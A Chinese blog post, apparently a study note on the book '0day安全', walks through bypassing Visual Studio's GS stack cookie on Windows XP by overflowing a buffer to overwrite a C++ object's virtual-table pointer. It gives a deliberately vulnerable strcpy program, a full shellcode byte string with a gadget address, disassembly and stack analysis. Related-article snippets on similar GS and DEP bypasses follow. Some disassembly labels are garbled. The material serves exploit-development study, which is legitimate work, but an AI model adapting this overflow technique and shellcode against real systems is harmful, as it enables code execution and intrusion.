还原0day----覆盖虚函数突破GS

最新推荐文章于 2022-10-10 22:06:45 发布
最新推荐文章于 2022-10-10 22:06:45 发布
阅读量444 收藏 1
点赞数
分类专栏: 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Joliph/article/details/80295529
版权

接上一篇,与vc++6.0(并没有GS安全机制)不一样的是,vs2008启用GS后的实例内存布局有些不一样,结合0day代码探究下突破GS的具体细节
C++代码:vs2008 release 优化禁用

#include "stdafx.h"
#include "string.h"

class GSVirtual {
public :
    void gsv(char * src)
    {
        char buf[200];
        strcpy(buf, src);
        bar(); // virtual function call
    }
    virtual void  bar()
    {
    }
};
int main()
{

    GSVirtual test;

    test.gsv(
        "\xF8\x1c\x92\x7C"   //需要替换成实验环境中的指令地址  
        "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
        "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
        "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
        "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
        "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
        "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
        "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
        "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
        "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
        "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
        "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90"
        );

    return 0;
}

main函数汇编代码:

004010B0 >  55              push ebp
004010B1    8BEC            mov ebp,esp
004010B3    51              push ecx
004010B4    8D4D FC         lea ecx,dword ptr ss:[ebp-0x4]
004010B7    E8 14000000     call 2.GSVirtual::GSVirtualkieionFilterructor'  ;构造函数
004010BC    68 00214000     push 2.00402100                                 ;shellcode压栈
004010C1    8D4D FC         lea ecx,dword ptr ss:[ebp-0x4]
004010C4    E8 37FFFFFF     call 2.GSVirtual::gsvep_stateeement             ;test.gsv()
004010C9    33C0            xor eax,eax
004010CB    8BE5            mov esp,ebp
004010CD    5D              pop ebp                                         
004010CE    C3              retn

此时的main函数堆栈如图所示这里写图片描述
0012FF74地址为test的地址,即test的this=0012FF74,其指向虚函数表这里写图片描述,004010A0为bar()的地址

00401000 >  55              push ebp
00401001    8BEC            mov ebp,esp
00401003    81EC E4000000   sub esp,0xE4
00401009    A1 18304000     mov eax,dword ptr ds:[__security_cookiedtableeme>
0040100E    33C5            xor eax,ebp
00401010    8945 FC         mov dword ptr ss:[ebp-0x4],eax
00401013    898D 2CFFFFFF   mov dword ptr ss:[ebp-0xD4],ecx
00401019    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
0040101C    8985 28FFFFFF   mov dword ptr ss:[ebp-0xD8],eax
00401022    8D8D 30FFFFFF   lea ecx,dword ptr ss:[ebp-0xD0]
00401028    898D 24FFFFFF   mov dword ptr ss:[ebp-0xDC],ecx
0040102E    8B95 24FFFFFF   mov edx,dword ptr ss:[ebp-0xDC]
00401034    8995 20FFFFFF   mov dword ptr ss:[ebp-0xE0],edx
0040103A    8B85 28FFFFFF   mov eax,dword ptr ss:[ebp-0xD8]
00401040    8A08            mov cl,byte ptr ds:[eax]
00401042    888D 1FFFFFFF   mov byte ptr ss:[ebp-0xE1],cl
00401048    8B95 24FFFFFF   mov edx,dword ptr ss:[ebp-0xDC]
0040104E    8A85 1FFFFFFF   mov al,byte ptr ss:[ebp-0xE1]
00401054    8802            mov byte ptr ds:[edx],al
00401056    8B8D 28FFFFFF   mov ecx,dword ptr ss:[ebp-0xD8]
0040105C    83C1 01         add ecx,0x1
0040105F    898D 28FFFFFF   mov dword ptr ss:[ebp-0xD8],ecx
00401065    8B95 24FFFFFF   mov edx,dword ptr ss:[ebp-0xDC]
0040106B    83C2 01         add edx,0x1
0040106E    8995 24FFFFFF   mov dword ptr ss:[ebp-0xDC],edx
00401074    80BD 1FFFFFFF 0>cmp byte ptr ss:[ebp-0xE1],0x0
0040107B  ^ 75 BD           jnz short 2.0040103A

字符串拷贝函数,拷贝完成之后正好结尾的’\0’覆盖了0012FF78的低位使得004021E4被更改为00402100,注意这里修改的0012FF78是main函数的栈空间,已经越过gsv的栈空间了,所以cookie,ebp,返回地址都已经被覆盖掉了
调用bar()的具体调用链:

0040107D    8B85 2CFFFFFF   mov eax,dword ptr ss:[ebp-0xD4]          eax=0012FF78
00401083    8B10            mov edx,dword ptr ds:[eax]               edx=eax
00401085    8B8D 2CFFFFFF   mov ecx,dword ptr ss:[ebp-0xD4]
0040108B    8B02            mov eax,dword ptr ds:[edx]               eax=[edx]
0040108D    FFD0            call eax                                 bar()

原本的this指针指向004021E4,从此取出004010A0,然后调用。但是其被修改为00402100后取地址(这里00402100指向了shellcode的开头,这个地址可以自定义,不一定只能修改最后一个字节)
这里请仔细观察下图的堆栈细节
细节
可以看到 0012FE9C是buf的起始地址,0012FE8C有个指针指向buf,只要我们能控制EIP指向0012FE9C即可控制程序流程,这里有两点要注意,第一控制EIP使用ret指令,寻找pop…pop到栈顶是0012FE8C,这时ret就可以让EIP指向shellcode了,但是还有一点需要注意,就是0012FF9C处的地址被解释成汇编代码后需要不影响shellcode的执行,不能出现异常指令,这个多找几个试试就行。最终我的电脑中找到了ntdll.dll中的7C921CF8指令。
弹出对话框
这里写图片描述

Istaroth
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
覆盖虚函数突破GS (踩坑)
weixin_30485291的博客
03-08 273
环境: xp sp3 vs 2008 参考文章: https://bbs.pediy.com/thread-211315.htm https://www.52pojie.cn/thread-490768-1-1.html 《0day安全软件漏洞分析技术》 10.3 节 代码: #include "stdafx.h" #include "string.h" class GSVirtual { pu...
0day 第10章--10.3:覆盖虚函数突破GS
I have a dream
11-01 435
实验环境:winxp sp3 vs2010 实验要求:程序要求禁用优化、release版本 实验原理:程序只有在函数返回时才检查Security Cookie,如果在函数检查之前劫持程序流程,就能实现缓冲区溢出了!因此可以利用C++中的虚函数!(为什么?见0day第6章攻击C++虚函数) [C++虚函数原理] {虚表指针->虚表->函数地址,call函数地址} 总结一下入的坑: (1)...
7.1 覆盖虚函数突破GS
qq_55202378的博客
10-10 593
GS 溢出
0Day》之通过覆盖虚表指针来突破GS
binghupo的博客
12-05 1048
对于栈溢出,微软做了GS防护,就是在函数栈帧初始化之后,生成一个随机的cookie,将其保存在EBP之前,同时在.data中也保存一份,在函数返回之前,先检测栈中cookie的值,如果我们还用之前栈溢出的方式,通过shellcode覆盖函数返回地址来达到溢出的目的,这时必然会覆盖掉栈中的cookie,这样的溢出就会被检测到,也就无法达到溢出的目的。但是正所谓你有张良计,我有过墙梯,GS的检测要在函
虚函数绕过 GS保护 学习
weixin_30432179的博客
09-08 153
#pragma strict_gs_check(on) 强制设置 GS保护 VS2008 当缓冲区<=4字节时 不被 GS保护 设置上面的 可以强制保护 #include "stdafx.h" #include <windows.h> #pragma strict_gs_check(on) void f(char str[]) { char ...
Day-to-daywithSubversion
02-21
Howmanytimeshaveyousaid"Whatversionisinproduction?"or"Canwerebuildproductiontofixabugandreleaseanupdate?"Betteryetmyfavourite:"We'reworkingonFeatureYsowecan'tfixthebugforFeatureX....
Delphi-日期时间函数详解.doc
12-01
Delphi 日期时间函数详解 Delphi 中的日期和时间函数是编程中非常重要的一部分,它可以帮助开发者更好地处理日期和时间相关的操作。下面是 Delphi 中一些常用的日期和时间函数的详解。 DateTimeToFileDate 函数 ...
Day16-30_Day16-30_python_
10-03
在Python学习之旅中,"Day16-30"阶段是一个关键的过渡期,涵盖了从基础知识到更高级概念的深入探索。在这个阶段,初学者会接触到许多重要的编程概念和技术,这些将为后续的学习打下坚实的基础。以下是这个阶段可能会...
day03-Docker
12-13
day03-Docker
openLayer-图层高亮 (day05)
最新发布
05-21
openLayer-图层高亮 (day05)
idirect3ddevice9虚函数偏移_图解利用虚函数GS保护
weixin_39677106的博客
11-20 181
前言个人感觉利用虚函数GS保护过程稍微会复杂些,因为涉及到多次跳转。为了写清楚利用虚函数GS,本文从payload构造切入,着重描写payload构建过程,从而让读者明白利用虚函数GS的细节;并且在payload构建过程,对跳转细节采用图解方式,让读者跳出代码,先理清楚整个逻辑关系,然后再载入payload,讲解整个payload运行过程。(需要说明的是文中的寻址图,仅仅为了更清楚...
突破GS之理论篇
anyingga7675的博客
10-07 299
GS就是一个缓冲区溢出标志,如果发生缓冲区溢出,该标志会被覆盖,导致其值和其在.data区域的备份值不同,由此系统进入异常处理流程,函数不会正常返回,ret指令也不会执行。 以下情况VS不会开启GS: 函数不包含缓冲区 函数被定义为具有变量参数列表 函数使用无保护的关键字标记 函数在第一个语句中包含内嵌汇编代码 缓冲区不是8字节类型且大小不大于4字节 开GS和不开GS的对比(此处均关...
虚函数突破GS
weixin_30709929的博客
05-19 101
如何确定变量的内存布局 为什么不直接执行buff里面的shellcode,而要绕远 因为虚表指针指向buff,buff的地址还要指向另一个地址,没有办法直接执行buff。这是由虚函数与虚表性质决定。 为什么执行完call还必须返回shellcode,call不就是call进shellcode吗? call是必须的,见问题2.然后剩下的问题是怎么回到shellcod...
0day 第10章--10.4节:攻击异常处理突破GS(2)
I have a dream
11-01 255
文章目录**实验原理:**实验环境:源程序: 实验原理: 传入参数过长,直到覆盖掉SEH句柄。将SHE句柄覆盖为shellcode地址即可。 实验环境: Winxp sp3 vs2010 Release版本、禁用优化、多了后面2个“否”(这样编译的程序就出现strcpy和strcat函数了,便于分析) 仅仅是这两个否,之后的程序分析就和书中一样了! 传说中的关闭safeseh的方法。。。 源程...
【分析】C++中通过溢出覆盖虚函数指针列表执行代码
FreeXploiT
03-30 1318
◆ C++中通过溢出覆盖虚函数指针列表执行代码 作者:watercloud 主页:http://www.nsfocus.com 日期:2002-4-15      目录:  1.  C++中虚函数的静态联编和动态联编  2.  VC中对象的空间组织和溢出试验  3.  GCC中对象的空间组织和溢出试验  4.  参考 C++中虚函数的静态联编和动态联编      C++中的一大法宝就是虚函数,简
栈溢出防御之——Windows安全机制GS编译选项
BetaBin
10-14 8269
安全漏洞中有个重灾区:栈溢出。利用类似memset之类的字符串修改函数,输入超出正常长度的字符串,导致栈溢出,从而影响其它数据(返回地址、标志变量等)。 维基百科给出的资料http://zh.wikipedia.org/wiki/%E5%A0%86%E6%A0%88%E6%BA%A2%E5%87%BA主要是函数无限调用导致的堆栈溢出,下面给出个0day2里面的例子温习下栈溢出: #includ
记录学习《0Day安全》路上遇到的问题解决方案 利用Ret2Libc挑战DEP
Z_LiT0的博客
05-03 794
if __author__ == "LiT0":0x00 前言在此节中,首次碰到书本上的错误(大神勿喷,请看完全文。按照我的思路执行成功) 具体在12.3.1节 关于利用ZwSetInformationProcess 的实践实验。实验了一晚上,按照书上一步步来总是出错。经过认真研究发现了一处错误。 系统环境与书上一致 xp sp3 && vc++ 没有gs 和 safeseh 0x01
0day安全:软件漏洞分析技术》的一点总结
giantbranch的专栏
03-25 7486
评价 首先评价一下这本书吧:(先抑后扬吧) 有些漏洞是win2000的,实在是太老了,难以进行实践,但是介绍一下也是很好的,但是不能实践理解得不深刻。【第一版是08年出版的,第二版是2011年,我手上的是第二版,这2014年,xp都停止服务啦(xp用着还是挺爽的哦)】
0day安全》——栈中的守护天使:GS
sunr_的博客
08-26 361
GS安全编译选项 原理 在栈帧中压入一个随机DWORD,IDA称之为“security cookie”,位于EBP之前。系统在.data区块中存放一个security cookie的副本。当栈发生溢出是,security cookie将被覆盖,之后才是EBP和返回地址。函数返回之前比对两者的值,如果改变则说明security cookie已被破坏,发生了溢出。 例外 额外的数据和操作带来的直接后果就是系统性能的下降,为了将对性能的影响降到最小,编译器在编译程序的时候并不是对所有的函数都应用 GS,以下情况
day--和--day区别
04-18
"day--"和"day"是两种不同的操作符,它们在编程中有着不同的含义和用法。 1. "day--"是一个后缀自减操作符,用于将变量的值减1,并返回减1之前的值。例如,如果有一个变量day的值为5,执行day--操作后,day的值将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值